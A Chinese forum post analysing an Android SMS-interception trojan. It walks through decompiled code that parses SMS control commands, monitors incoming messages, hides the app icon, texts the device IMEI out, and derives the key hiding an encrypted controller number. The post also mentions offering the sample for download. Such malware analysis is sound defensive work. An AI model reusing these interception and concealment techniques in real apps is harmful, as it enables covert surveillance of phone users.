短信拦截马之加密号码分析2
0x00-0前言的前面帖 子发出来好几天了,期间被工头叫过去搬砖了,今天回来一看想不到大家这么热情,应版主要求和各位的热烈需求,此处整理了一下帖子,供大家观看,并附上了样 本,密码52pojie,样本其实给出了看雪的下载链接,照顾没有看雪账号的朋友,特此一发。之前未发出完整版绝非为了赚下载,只是本人排版很渣
,怕拍出来乱七八糟,还不如看word效果好,这个效果排版效果如何,大家凑合着看吧,本渣尽力了,哈哈!0x00 前言
新加入论坛,发一下之前的一篇文章,算是给论坛的一点小支持。
样本来自看雪论坛http://bbs.pediy.com/showthread.php?t=204096,当时已给出答案,此处主要写一下分析过 程,算是总结一下,共同进步。首先声明,该样本未被加壳,程序部分混淆,但不严重,主要看论坛中还未涉及此类话题,其次论坛中有人对此加密号码分析过程还 比较感兴趣,所以来一发。
本人菜鸟一枚,首次发帖,高手默默飘过就行,欢迎拍砖!
0x01 特殊字符
JxB打开apk,未加壳,看strings有
1:43410150d9cc2072b6396f06bf57eada5acb86f0d9ee4a45
2:10801d06de02ed80cc58e431c7f1d2ac
明显是被加密了,至于加密的是什么,还是接着分析。
双击10801d06de02ed80cc58e431c7f1d2ac进入引用它的代码(搜索找到也行)。smali转java,可以看出该类主要是进 行shared_prefs处理的,明显的字段名有好多,但是该字段是a01,所以要分析其具体作用,还得继续回溯代码。
ctrl+X查找函数d()的引用,有4个,一个一个看。
0x02 第一个方向:函数d()的引用
1. privateboolean b(String arg7, String arg8, int arg9) { 2. intv5 = 2; 3. booleanv0 = true; 4. if(arg7.contains(a.a(this.a).d())) { 5. String[]v2 = arg8.split(" "); 6. if(v2[0].equals("LJ")) { 7. if(v2[1].equals("ALL")) { 8. a.a(this.a).a(1); 9. return v0; 10. } 11. 12. if(v2[1].equals("SOME")){ 13. a.a(this.a).a(v5); 14. return v0; 15. } 16. 17. if(!v2[1].equals("NO")) { 18. return v0; 19. } 20. 21. a.a(this.a).a(3); 22. returnv0; }
可以看出函数b(估计看过以前分析的都知道该函数是短信控制命令的解析与执行,由此就知道arg7是手机号,arg8是短 信内容了),我们此处暂且认为不知道这些,继续查找函数b的引用,被本类的函数a调用。a函数的交叉引用是类com.phone.stop.a.c中的函 数a,该类是一个短信数据库观察者类,显然是对新到短信进行拦截和监控的。
private voida() {[/align] Cursor v0 = this.b.query(b.b, null,null, null,"_id desc"); if(v0 == null || v0.getCount() == 0){ this.a(v0); } else { if(v0.moveToNext()) { String v1 = v0.getString(v0.getColumnIndex("date")); if(v1.compareTo(a.a(this.a).b()) > 0) { a.a(this.a).a(v1); int v1_1= v0.getInt(0); this.a(v1_1); String v2= v0.getString(v0.getColumnIndex("address")); String v3= v0.getString(v0.getColumnIndex("body")); this.a(v0); this.a(v2, v3,v1_1); } } this.a(v0);}
0x03换一个方向
public voidc(String arg3) { SharedPreferences$Editorv0 = this.b.edit(); v0.putString("a01", arg3); v0.commit(); }
public staticvoid a(Context arg2) { if(!com.phone.stop.a.a.a(arg2).e()) { com.phone.stop.a.a.a(arg2).c(com.phone.stop.b.a.a(com.phone.stop.a.a.a(arg2).d())); com.phone.stop.a.a.a(arg2).b(true); } }
public staticString a(String arg2) {[/align] String v0_1; try { v0_1 = new b(com.phone.stop.a.b.f).b(arg2); } catch(Exceptionv0) { v0.printStackTrace(); v0_1 = ""; } return v0_1; }
0x04密钥的小伎俩前面找到了com.phone.stop.a.b.f就是解密密钥,下面就看其生成过程,交叉引用如下:
public staticString a(StringBuffer arg1){ arg1.append('x'); b.f = arg1.toString().getBytes(); return arg1.toString(); }
protectedvoid onCreate(Bundle arg5) {[/align] super.onCreate(arg5); this.setContentView(2130903041); com.phone.stop.b.b.a(); this.getPackageManager().setComponentEnabledSetting(this.getComponentName(),2, 1); com.phone.stop.b.b.a(((Context)this)); com.phone.stop.b.b.b(((Context)this)); if(!a.a(((Context)this)).i()) { e.a("软件安装完毕\n识别码:" + this.getSystemService("phone").getDeviceId() + "\n"+ d.a(), ((Context) this)); a.a(((Context)this)).e(true); } com.phone.stop.b.a.b(((Context)this)); this.a(); }
0x05后记
最后再次PS:首次发帖,欢迎拍砖!